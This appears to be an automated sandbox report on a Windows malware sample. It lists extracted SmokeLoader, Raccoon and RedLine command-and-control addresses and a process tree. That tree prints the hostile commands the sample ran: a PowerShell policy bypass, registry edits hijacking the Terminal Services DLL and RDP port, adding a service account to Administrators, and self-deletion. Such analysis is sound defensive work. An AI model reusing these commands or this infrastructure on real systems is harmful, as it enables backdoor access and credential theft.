Analysis
-
max time kernel
151s -
max time network
138s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
12-10-2021 17:46
Static task
static1
Behavioral task
behavioral1
Sample
f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe
Resource
win10-en-20210920
General
-
Target
f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe
-
Size
175KB
-
MD5
741f960ae2f91ba7b632f472e1995d63
-
SHA1
afbd300aa5566ca3fa5ea56a5a236f5ec91cd5c3
-
SHA256
f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e
-
SHA512
2da69da4ee0f1627705b272dbe6d2599afa52ad0d87e0172cf832625a77ee9d7a899addab3925645b92cfd642d9a9d5dac8a69a200ebe0b2380cd7cb75cf90f7
Malware Config
Extracted
smokeloader
2020
http://linavanandr11.club/
http://iselaharty12.club/
http://giovaninardo13.club/
http://zayneliann14.club/
http://zorinosali15.club/
Extracted
raccoon
1.8.2
676b1a32c7d2ce2aba84e8823871900d67e00049
-
url4cnc
http://telemirror.top/kaba4ello
http://tgmirror.top/kaba4ello
http://telegatt.top/kaba4ello
http://telegka.top/kaba4ello
http://telegin.top/kaba4ello
https://t.me/kaba4ello
Extracted
redline
w1
109.234.34.165:12323
Extracted
raccoon
1.8.2
8d179b9e611eee525425544ee8c6d77360ab7cd9
-
url4cnc
http://teletop.top/agrybirdsgamerept
http://teleta.top/agrybirdsgamerept
https://t.me/agrybirdsgamerept
Extracted
redline
MegaProliv
93.115.20.139:28978
Extracted
redline
Newpro
139.99.118.252:12517
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 7 IoCs
resource yara_rule behavioral1/memory/2748-132-0x0000000000740000-0x0000000000771000-memory.dmp family_redline behavioral1/memory/2748-137-0x00000000008B0000-0x00000000008CC000-memory.dmp family_redline behavioral1/memory/2928-167-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/2928-168-0x000000000041B25E-mapping.dmp family_redline behavioral1/memory/2280-178-0x000000000F040000-0x000000000F07D000-memory.dmp family_redline behavioral1/memory/2280-181-0x000000000F0C0000-0x000000000F0FC000-memory.dmp family_redline behavioral1/memory/2928-201-0x0000000005270000-0x0000000005876000-memory.dmp family_redline -
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
pid Process 2864 FC33.exe 3644 329.exe 2748 BA6.exe 1192 1C12.exe 1480 2606.exe 2280 3029.exe 2928 2606.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Deletes itself 1 IoCs
pid Process 1588 Process not Found -
Loads dropped DLL 5 IoCs
pid Process 2864 FC33.exe 2864 FC33.exe 2864 FC33.exe 2864 FC33.exe 2864 FC33.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts FC33.exe -
Accesses Microsoft Outlook profiles 1 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook FC33.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook FC33.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook FC33.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook FC33.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook FC33.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook FC33.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook FC33.exe Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook FC33.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2372 set thread context of 3564 2372 f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe 69 PID 1480 set thread context of 2928 1480 2606.exe 77 -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1056 timeout.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1592 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3564 f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe 3564 f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found 1588 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1588 Process not Found -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 636 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3564 f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
description pid Process Token: SeShutdownPrivilege 1588 Process not Found Token: SeCreatePagefilePrivilege 1588 Process not Found Token: SeShutdownPrivilege 1588 Process not Found Token: SeCreatePagefilePrivilege 1588 Process not Found Token: SeShutdownPrivilege 1588 Process not Found Token: SeCreatePagefilePrivilege 1588 Process not Found Token: SeShutdownPrivilege 1588 Process not Found Token: SeCreatePagefilePrivilege 1588 Process not Found Token: SeDebugPrivilege 2748 BA6.exe Token: SeShutdownPrivilege 1588 Process not Found Token: SeCreatePagefilePrivilege 1588 Process not Found Token: SeShutdownPrivilege 1588 Process not Found Token: SeCreatePagefilePrivilege 1588 Process not Found Token: SeDebugPrivilege 2928 2606.exe Token: SeDebugPrivilege 2280 3029.exe Token: SeDebugPrivilege 3608 powershell.exe Token: SeShutdownPrivilege 1588 Process not Found Token: SeCreatePagefilePrivilege 1588 Process not Found Token: SeShutdownPrivilege 1588 Process not Found Token: SeCreatePagefilePrivilege 1588 Process not Found Token: SeShutdownPrivilege 1588 Process not Found Token: SeCreatePagefilePrivilege 1588 Process not Found Token: SeDebugPrivilege 2212 powershell.exe Token: SeDebugPrivilege 2292 powershell.exe Token: SeShutdownPrivilege 1588 Process not Found Token: SeCreatePagefilePrivilege 1588 Process not Found Token: SeShutdownPrivilege 1588 Process not Found Token: SeCreatePagefilePrivilege 1588 Process not Found Token: SeDebugPrivilege 1124 powershell.exe Token: SeShutdownPrivilege 1588 Process not Found Token: SeCreatePagefilePrivilege 1588 Process not Found Token: SeShutdownPrivilege 1588 Process not Found Token: SeCreatePagefilePrivilege 1588 Process not Found Token: SeShutdownPrivilege 1588 Process not Found Token: SeCreatePagefilePrivilege 1588 Process not Found Token: SeShutdownPrivilege 1588 Process not Found Token: SeCreatePagefilePrivilege 1588 Process not Found Token: SeShutdownPrivilege 1588 Process not Found Token: SeCreatePagefilePrivilege 1588 Process not Found -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1588 Process not Found 1588 Process not Found -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1588 Process not Found 1588 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2372 wrote to memory of 3564 2372 f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe 69 PID 2372 wrote to memory of 3564 2372 f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe 69 PID 2372 wrote to memory of 3564 2372 f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe 69 PID 2372 wrote to memory of 3564 2372 f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe 69 PID 2372 wrote to memory of 3564 2372 f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe 69 PID 2372 wrote to memory of 3564 2372 f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe 69 PID 1588 wrote to memory of 2864 1588 Process not Found 71 PID 1588 wrote to memory of 2864 1588 Process not Found 71 PID 1588 wrote to memory of 2864 1588 Process not Found 71 PID 1588 wrote to memory of 3644 1588 Process not Found 72 PID 1588 wrote to memory of 3644 1588 Process not Found 72 PID 1588 wrote to memory of 3644 1588 Process not Found 72 PID 1588 wrote to memory of 2748 1588 Process not Found 73 PID 1588 wrote to memory of 2748 1588 Process not Found 73 PID 1588 wrote to memory of 2748 1588 Process not Found 73 PID 1588 wrote to memory of 1192 1588 Process not Found 74 PID 1588 wrote to memory of 1192 1588 Process not Found 74 PID 1588 wrote to memory of 1192 1588 Process not Found 74 PID 1588 wrote to memory of 1480 1588 Process not Found 75 PID 1588 wrote to memory of 1480 1588 Process not Found 75 PID 1588 wrote to memory of 1480 1588 Process not Found 75 PID 1480 wrote to memory of 2928 1480 2606.exe 77 PID 1480 wrote to memory of 2928 1480 2606.exe 77 PID 1480 wrote to memory of 2928 1480 2606.exe 77 PID 1588 wrote to memory of 2280 1588 Process not Found 78 PID 1588 wrote to memory of 2280 1588 Process not Found 78 PID 1588 wrote to memory of 2280 1588 Process not Found 78 PID 1480 wrote to memory of 2928 1480 2606.exe 77 PID 1480 wrote to memory of 2928 1480 2606.exe 77 PID 1480 wrote to memory of 2928 1480 2606.exe 77 PID 1480 wrote to memory of 2928 1480 2606.exe 77 PID 1480 wrote to memory of 2928 1480 2606.exe 77 PID 1192 wrote to memory of 3608 1192 1C12.exe 82 PID 1192 wrote to memory of 3608 1192 1C12.exe 82 PID 1192 wrote to memory of 3608 1192 1C12.exe 82 PID 3608 wrote to memory of 1836 3608 powershell.exe 85 PID 3608 wrote to memory of 1836 3608 powershell.exe 85 PID 3608 wrote to memory of 1836 3608 powershell.exe 85 PID 1836 wrote to memory of 616 1836 csc.exe 86 PID 1836 wrote to memory of 616 1836 csc.exe 86 PID 1836 wrote to memory of 616 1836 csc.exe 86 PID 3608 wrote to memory of 2212 3608 powershell.exe 87 PID 3608 wrote to memory of 2212 3608 powershell.exe 87 PID 3608 wrote to memory of 2212 3608 powershell.exe 87 PID 3608 wrote to memory of 2292 3608 powershell.exe 89 PID 3608 wrote to memory of 2292 3608 powershell.exe 89 PID 3608 wrote to memory of 2292 3608 powershell.exe 89 PID 3608 wrote to memory of 1124 3608 powershell.exe 91 PID 3608 wrote to memory of 1124 3608 powershell.exe 91 PID 3608 wrote to memory of 1124 3608 powershell.exe 91 PID 3608 wrote to memory of 2580 3608 powershell.exe 93 PID 3608 wrote to memory of 2580 3608 powershell.exe 93 PID 3608 wrote to memory of 2580 3608 powershell.exe 93 PID 3608 wrote to memory of 1592 3608 powershell.exe 94 PID 3608 wrote to memory of 1592 3608 powershell.exe 94 PID 3608 wrote to memory of 1592 3608 powershell.exe 94 PID 3608 wrote to memory of 1292 3608 powershell.exe 95 PID 3608 wrote to memory of 1292 3608 powershell.exe 95 PID 3608 wrote to memory of 1292 3608 powershell.exe 95 PID 3608 wrote to memory of 612 3608 powershell.exe 96 PID 3608 wrote to memory of 612 3608 powershell.exe 96 PID 3608 wrote to memory of 612 3608 powershell.exe 96 PID 612 wrote to memory of 2180 612 net.exe 97 PID 612 wrote to memory of 2180 612 net.exe 97 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook FC33.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook FC33.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe"C:\Users\Admin\AppData\Local\Temp\f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Users\Admin\AppData\Local\Temp\f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe"C:\Users\Admin\AppData\Local\Temp\f901f95b307d303778cafcb4b3158b8e4afd6b001c55461165fb55bd0c1fc29e.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3564
-
-
C:\Users\Admin\AppData\Local\Temp\FC33.exeC:\Users\Admin\AppData\Local\Temp\FC33.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:2864 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\FC33.exe"2⤵PID:1044
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:1056
-
-
-
C:\Users\Admin\AppData\Local\Temp\329.exeC:\Users\Admin\AppData\Local\Temp\329.exe1⤵
- Executes dropped EXE
PID:3644
-
C:\Users\Admin\AppData\Local\Temp\BA6.exeC:\Users\Admin\AppData\Local\Temp\BA6.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
C:\Users\Admin\AppData\Local\Temp\1C12.exeC:\Users\Admin\AppData\Local\Temp\1C12.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i2xhgsw3\i2xhgsw3.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7088.tmp" "c:\Users\Admin\AppData\Local\Temp\i2xhgsw3\CSCC7A74A6CCD2147D9B5306EC3A5757ECE.TMP"4⤵PID:616
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2212
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1292
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:612 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2180
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵PID:2184
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵PID:428
-
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵PID:2416
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:424
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:1788
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵PID:4052
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵PID:3068
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:4064
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2292
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:3976
-
-
-
C:\Users\Admin\AppData\Local\Temp\2606.exeC:\Users\Admin\AppData\Local\Temp\2606.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Users\Admin\AppData\Local\Temp\2606.exeC:\Users\Admin\AppData\Local\Temp\2606.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
C:\Users\Admin\AppData\Local\Temp\3029.exeC:\Users\Admin\AppData\Local\Temp\3029.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2280